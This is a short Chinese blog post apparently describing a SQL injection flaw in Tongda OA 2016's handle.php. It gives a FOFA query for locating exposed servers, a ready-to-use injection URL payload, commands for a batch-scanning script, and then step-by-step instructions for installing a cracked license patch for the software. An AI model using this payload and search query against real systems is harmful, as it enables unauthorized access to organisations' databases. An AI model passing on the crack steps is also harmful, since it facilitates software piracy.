通达OA 2016网络智能办公系统 handle.php SQL注入漏洞

一、漏洞描述

北京通达信科科技有限公司通达OA2016网络智能办公系统 handle.php 存在sql注入漏洞,攻击者可利用此漏洞获取数据库管理员权限,查询数据、获取系统信息,威胁企业单位数据安全。

二、网络空间搜索引擎查询

fofa查询

app="TDXK-通达OA" && body="2016"

三、漏洞复现

poc

/share/handle.php?_GET[module]=1%27+and+1={`=%27`+1}+and+1=0+union+select+(select/**/user())--+%27

浏览器直接访问

四、批量检测

单个检测

 python .\TdOA2016.py -u  http://ip:port

批量检测

 python .\TdOA2016.py -u filename

微信公众号关注 网络安全透视镜 回复 20231016 获取批量检测脚本

通达OA2016破解补丁安装步骤: ============================= 1、到官网下载OA2016最新版服务端安装包、用户PC端办公精灵、手机端下载址:http://www.tongda2000.com/download/2016.php 2、安装OA服务端到电脑或服务器或云主机或VPS主机 3、安装完,在OA服务管理器(MYOA\BIN\monitor.exe)中关闭所有OA服务,并退出服务控制器monitor.exe。 4、替换补丁中bin和webroot里的文件。直接复制粘贴就可以。 5、到D:\MYOA\BIN目录运行monitor.exe 并启动OA所有服务 6、检查OA所有服务是否正常开启。 7、在OA服务端上打开浏览器,输入http://localhost按提示升级(如果设置了端口的,末尾加上:端口号) 如果未出现“开始升级”,请检查MYOA\webroot\attachment\update下是否有lock.txt,有测删掉后重新打开OA登录页面,点击开始升级!!! 8、登录OA后按F5刷新网页,并到【系统管理】=》【系统资源管理】=》【资源监控】=》【系统缓存数据】=》更新系统缓存数据。 9、系统管理-->定时任务管理-->检查系统更新-->设置-->关闭系统更新!!!!这步一定要做!要仔细检查! 正式使用时删除演示数据 10、到【系统管理】=》【系统资源管理】=》【演示数据清理】=》根据需要全删除或只删除单位、部门、用户、工作流。然后做一次第9步即可刷新单位、部门信息,删除完数据按第8步刷新OA缓存。 =============================
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值